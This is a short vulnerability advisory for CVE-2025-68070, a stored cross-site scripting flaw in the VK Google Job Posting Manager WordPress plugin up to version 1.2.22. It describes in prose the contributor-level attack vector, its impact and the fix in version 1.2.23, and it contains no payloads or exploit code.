CVE-2025-68070

Vulnerability

Overview

The VK Google Job Posting Manager plugin for WordPress (versions ≤1.2.22) contains a stored cross-site scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This means that input provided through certain plugin fields is not sanitized before being stored and later displayed to users, allowing malicious scripts to be permanently injected into pages.

Attack

Vector and Exploitation

The vulnerability can be exploited by an attacker with contributor-level privileges or higher (the exact role is not specified but requires authenticated access). The attacker can inject a crafted payload—such as JavaScript—into a vulnerable field, which will then execute whenever an administrator or visitor views the affected page [1]. User interaction is required for exploitation in some scenarios (e.g., clicking a link), but the stored nature of the XSS means the malicious payload automatically runs when the page is loaded without additional user action.

Impact

Successful exploitation enables the attacker to perform arbitrary actions within the context of the victim's browser session, including redirecting users to malicious sites, displaying fraudulent advertisements, stealing session cookies, or defacing the website [1]. This can lead to reputational damage, data theft, or further compromise of the WordPress installation.

Mitigation and

Advisory

The vendor released version 1.2.23 which resolves the issue by properly sanitizing input. Users are strongly advised to update immediately [1]. For sites unable to update, consider restricting contributor roles and applying web application firewall rules. This vulnerability is listed in Patchstack's database and is considered a medium severity issue (CVSS 6.5) [1].